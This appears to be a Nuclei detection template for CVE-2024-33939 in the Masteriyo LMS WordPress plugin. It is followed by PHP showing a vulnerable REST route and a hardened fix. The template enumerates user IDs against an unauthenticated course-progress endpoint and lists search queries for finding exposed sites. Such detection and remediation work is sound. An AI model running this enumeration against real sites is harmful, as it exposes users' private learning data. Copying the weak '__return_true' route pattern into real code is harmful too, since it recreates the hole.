id: CVE-2024-33939

info:
  name: Masteriyo LMS <= 1.7.3 - Insecure Direct Object Reference
  author: Sourabh-Sahu
  severity: medium
  description: |
    Authentication Bypass Using an Alternate Path or Channel vulnerability in Masteriyo Masteriyo - LMS. Unauthenticated access to course progress. This issue affects Masteriyo - LMS: from n/a through 1.7.3.
  impact: |
    An unauthenticated attacker can access course progress and user learning data without logging in.
  remediation: |
    Update the Masteriyo LMS plugin to the latest version and enforce proper authentication and authorization checks on REST API endpoints.
  reference:
    - https://wpscan.com/vulnerability/57c0054a-b713-4f7c-8e41-c009b07624a6/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-33939
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-33939
    cwe-id: CWE-288
    epss-score: 0.07463
    epss-percentile: 0.91905
    cpe: cpe:2.3:a:themegrill:masteriyo:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 11
    shodan-query: http.html:"/wp-content/plugins/learning-management-system/"
    fofa-query: body=/wp-content/plugins/learning-management-system/
    google-query: inurl:"/wp-content/plugins/learning-management-system/"
  tags: cve,cve2024,wordpress,wp-plugin,lms,idor,unauth,learning-management-system,vkev

http:
  - raw:
      - |
        GET /wp-json/masteriyo/v1/course-progress?user_id={{user}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      user:
        - "1"
        - "2"
        - "3"
        - "4"
        - "5"
        - "6"
        - "7"
        - "8"
        - "9"
        - "10"
    attack: clusterbomb
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"course_id\":", "\"course_permalink\":", "\"status\":")'
        condition: and
# digest: 4b0a00483046022100a185bdf9ccf30f7ed1f7f2cfd63140e6fd475483380e684e418e4853b3e37cd5022100c229dce3686871f2a0a020f869f6c334b7737faf2158489a0385b045377390ab:922c64590222798bb761d5b6d8e72950
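The remediation line above asks for authentication and authorization checks on the REST endpoint. The following PHP is an added illustration of that fix for a WordPress REST route, not Masteriyo's code: the route namespace `example-lms/v1`, the route paths and the function names are hypothetical. The first route shows the weak pattern that this class of bug (CWE-288, an unauthenticated alternate path to per-user data) comes from: `permission_callback` set to `__return_true`, so the `user_id` parameter alone selects whose progress is returned. The second route requires a logged-in user and only lets a caller read another user's progress when it holds the `list_users` capability.

```php
<?php
// Added illustration only; not the plugin's own code. Route names and
// function names are hypothetical.

add_action( 'rest_api_init', function () {
    // Weak pattern: no authentication or authorization at all. Any visitor
    // can supply ?user_id=N and read that user's course progress.
    register_rest_route( 'example-lms/v1', '/course-progress', array(
        'methods'             => 'GET',
        'callback'            => 'example_lms_get_progress',
        'permission_callback' => '__return_true',
    ) );

    // Hardened: authenticate the caller and tie user_id to that caller
    // unless they can legitimately look at other users.
    register_rest_route( 'example-lms/v1', '/course-progress-secure', array(
        'methods'             => 'GET',
        'callback'            => 'example_lms_get_progress',
        'permission_callback' => 'example_lms_progress_permission',
        'args'                => array(
            'user_id' => array(
                'type'              => 'integer',
                'sanitize_callback' => 'absint',
            ),
        ),
    ) );
} );

/**
 * Permission check run by the REST server before the route callback.
 * Returns true to allow, or a WP_Error with an HTTP status to deny.
 */
function example_lms_progress_permission( WP_REST_Request $request ) {
    $current = get_current_user_id();
    if ( 0 === $current ) {
        // Anonymous request: cookie+nonce or application-password auth did not
        // establish a user, so refuse before any data is touched.
        return new WP_Error( 'rest_forbidden', 'Authentication required.', array( 'status' => 401 ) );
    }

    $requested = absint( $request->get_param( 'user_id' ) );
    if ( 0 === $requested || $requested === $current ) {
        // No user_id, or the caller asked for their own progress.
        return true;
    }

    if ( current_user_can( 'list_users' ) ) {
        // Site staff who can already see the user list may inspect others.
        return true;
    }

    return new WP_Error( 'rest_forbidden', 'You may only view your own course progress.', array( 'status' => 403 ) );
}

/** Route callback; only reached when the permission callback returned true. */
function example_lms_get_progress( WP_REST_Request $request ) {
    $user_id = absint( $request->get_param( 'user_id' ) );
    if ( 0 === $user_id ) {
        $user_id = get_current_user_id();
    }
    // Hypothetical data lookup via a filter; a real plugin would query its
    // own progress tables here.
    $progress = apply_filters( 'example_lms_progress_data', array(), $user_id );
    return rest_ensure_response( $progress );
}
```

With the hardened route, the unauthenticated request the template sends (`GET /wp-json/.../course-progress?user_id=1` with no cookie, nonce or application password) gets a 401 `rest_forbidden` JSON error instead of a 200 body containing `"course_id"`, `"course_permalink"` and `"status"`, so the template's `contains_all` matcher no longer fires. The check belongs in `permission_callback` rather than inside the route callback so that the REST server enforces it uniformly, including for requests that arrive through `rest_do_request()` or batch endpoints.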